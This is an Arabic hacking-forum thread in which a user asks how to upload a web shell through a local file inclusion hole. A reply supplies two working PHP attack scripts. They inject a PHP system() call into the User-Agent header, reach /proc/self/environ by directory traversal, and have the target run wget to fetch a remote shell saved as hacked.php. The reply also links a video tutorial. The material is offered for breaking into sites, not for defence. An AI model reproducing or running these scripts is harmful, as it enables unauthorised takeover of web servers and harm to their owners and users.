مشكله برفع شل ثغرة LF

حربي هكر · 10-19-2010, 02:35 AM

السلام عليكم ؟ اخواني انا اليوم مسكت معي ارفع شل بثغرة L F I

بس تابعت شرح ؟؟ بس مو واضح الي بالدوره والله مو واضح وملخبط مرة

فيه شرح ؟؟ عن طريق اضافه اداه فايرفوكس ؟؟

بس ممكن شخص يدلني على الطريقه

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC la;gi fvtu ag eyvm LF

DaRk DrEaM · 10-19-2010, 10:09 AM

بأنتظار أحد الخبراء في هذا المجال يا غالي

KaLa$nikoV · 10-19-2010, 05:26 PM

عندك اكثر من طريقه للرفع كله يوصل لنفس الناتج

اهم شيء انك تقرا ملف

كود PHP:

  proc/self/environ

لو عرفت تقراه معناه غصب راح نرفع لك شيل منها !!
شوف هون

كود:

 http://sc0rpion.ir/tutorial-clips/Getting-shell-by-lfi-via-user-agent.rar 
PHP script :

	كود PHP:
	
		
			
<?php 
ini_set('user_agent' , "<?php system('wget [shell] -O user.php'); ?> ");
$result = file_get_contents('http://[site]/../../proc/self/environ');
?>

هاد كود php بتعدل عليه الي بلزم ومعاه شرح يرفع لك شل بنفس الاسلوب لكن بدون الفايرفوكس !!

كمان كود اخر يقوم بنفس العمليه بس يختلف قليلا (رغم اني اشوفه فاشل بدون تجربه

كود PHP:

  
<?php

 
//Get Shell Via LFI(Local File Inclusion)

//Copyright BlackDream 2009 

//mr.pr0n you are the best boy

 
 
//edit this if you want. Linux Command

$cmd = "<?php system(\"wget http://h1.Spam.com/s0ra/s0ra.txt; mv shell.txt hacked.php\");?>";

$site = "http://www.evilsite.com/index.php?page="; //enter it like http://www.thesite.com/index.php?page=

$proc_path = "proc/self/environ"; //without first slash

 
 
//Do not edit below this line

 
preg_match( "@^(http://.*?)(/|$)@", $site, $matches );

 
$path = "";

$i = 0;

 
while ( 1 )

{

    if ( $i >= 20 )

        break;

 
    $path .= "../";

    $source = page_get_*******( $site . $path . $proc_path );

    if ( strstr($source, '********_ROOT') != false )

    {

        exit( "\nShell Uploaded With Success -> " . $matches[1] . '/' . "hacked.php" );

    } else

        echo "\nFail at state " . $i . "\n";

    $i++;

}

 
function page_get_*******( $url )

{

    global $cmd;

    $ch = curl_init( $url );

    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );

    curl_setopt( $ch, CURLOPT_HEADER, 0 );

    curl_setopt( $ch, CURLOPT_USERAGENT, $cmd );

    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, 2 );

    curl_setopt( $ch, CURLOPT_TIMEOUT, 4 );

    $ret = curl_exec( $ch );

    curl_close( $ch );

    return $ret;

}

 
?>

 
 
 
وهاد شرح روعه لسا ولا عربي شرحه 

 
ركز فيه كويس هو استخدم اسلوب سهل كثير

     التوقيع  
   

 
 هل سأعود يوما 

ام هي نهايه الطريق !!

إلهيْ ’ / أبدل عُسَرِنا يسُراً  
 
 
 لا تنسونا من دعائكم 
 
 
 
 
 
 
 

سبحان الله والحمدلله ولا اله الا الله والله اكبر
 fb.com/groups/VoLc4n0/
 volc4n0@hotmail.com

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
مشكله بـ اكتشاف ثغرة وتحليل السيكربت	حربي هكر	جـــ'ابات العناكــ'ب	0	08-07-2010 08:47 PM
مساعده برفع شل من ebay-clone	awras	جـــ'ابات العناكــ'ب	4	04-22-2010 02:53 PM
مشكله في ثغرة حقن ؟؟؟	T-72	جـــ'ابات العناكــ'ب	8	03-20-2010 11:17 PM
فشل برفع الشل ؟؟	T-72	جـــ'ابات العناكــ'ب	4	01-22-2010 11:19 PM
لكل من واجه مشكله في ترقيع ثغرة vBulletin 3.8.4 PL1 XSS تم الحل	xman2	قســم تطويــر المــــواقع	4	12-08-2009 03:11 PM

مشكله برفع شل ثغرة LF

جـــ'ابات العناكــ'ب